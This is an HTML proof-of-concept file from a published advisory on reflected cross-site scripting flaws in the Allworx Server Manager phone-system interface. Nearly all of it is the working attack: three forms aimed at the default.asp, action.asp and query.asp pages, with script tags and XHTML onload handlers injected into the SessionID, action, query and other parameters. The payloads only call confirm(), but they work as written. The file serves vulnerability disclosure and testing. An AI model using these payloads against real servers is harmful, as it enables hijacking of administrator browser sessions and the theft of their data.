<!DOCTYPE html> <!-- Allworx Server Manager Multiple Cross-Site Scripting Vulnerabilities Vendor: Allworx Corporation Product web page: https://www.allworx.com Affected version: 6x, 6x12 and 48x Summary: The Allworx phone system enables users to manage voicemails in the Allworx Message Center and customize the personal phone system configurations using My Allworx Manager. Desc: Allworx server manager interface suffers from multiple reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 10 Server IST OIS Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5440 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5440.php 31.10.2017 --> <html> <head> <title>Allworx Server Manager Multiple Cross-Site Scripting Vulnerabilities</title> </head> <body> <script>history.pushState('', '', '/')</script> <br />::: default.asp :::<br /> ∇ <form action="http://192.168.2.254/default.asp"> <input type="hidden" name="Tab" value='MyConferences"><script>confirm(0)</script>' /> <input type="hidden" name="SessionID" value='0000"><script>confirm(1)</script>' /> <input type="hidden" name="Op" value="ModConf" /> <input type="hidden" name="key" value='2"><script>confirm(2)</script>' /> <input type="submit" value="Submit request 1" /> </form> <br />::: action.asp :::<br /> ∇ <form action="http://192.168.2.254/action.asp"> <input type="hidden" name="action" value='selectActivePresence"><script>confirm(3)</script>' /> <input type="hidden" name="SessionID" value="zsl" /> <input type="hidden" name="LoginName" value="admin" /> <input type="hidden" name="Presence" value="0" /> <input type="hidden" name="AnnounceOnlyIndices" value="" /> <input type="submit" value="Submit request 2" /> </form> <br />::: query.asp :::<br /> ∇ <form action="http://192.168.2.254/query.asp"> <input type="hidden" name="query" value="RepQuery<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(4)'/></a>" /> <input type="hidden" name="SessionID" value="251<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(5)'/></a>" /> <input type="hidden" name="repName" value="SystemSettings" /> <input type="hidden" name="fields" value="sysProfileName,hostLanTcpIpAddress,hostWanTcpIpAddress" /> <input type="hidden" name="groupName" value="records<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(6)'/></a>" /> <input type="hidden" name="recName" value="record<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(7)'/></a>" /> <input type="hidden" name="rnd" value="20435" /> <input type="submit" value="Submit request 3" /> </form> </body> </html>